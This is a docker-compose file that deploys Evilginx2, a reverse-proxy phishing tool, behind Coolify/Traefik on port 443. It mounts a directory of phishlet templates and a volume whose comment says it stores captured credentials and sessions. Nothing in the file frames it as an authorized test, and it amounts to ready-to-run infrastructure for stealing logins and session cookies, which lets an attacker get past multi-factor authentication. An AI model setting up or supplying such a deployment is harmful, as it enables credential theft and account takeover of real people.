version: "3.8"

services:
  evilginx:
    image: warhorse/evilginx2:latest
    container_name: evilginx2          # friendly name (optional)

    expose:
      - "443"                          # Evilginx listens on 443 inside

    labels:
      - coolify.port=443               # Coolify/Traefik targets port 443
      - traefik.http.services.evilginx.loadbalancer.server.scheme=https
                                        # tell Traefik to use HTTPS upstream

    volumes:
      - ./phishlets:/phishlets          # your YAML templates
      - config_data:/config             # captured creds / sessions

    restart: unless-stopped

volumes:
  config_data:
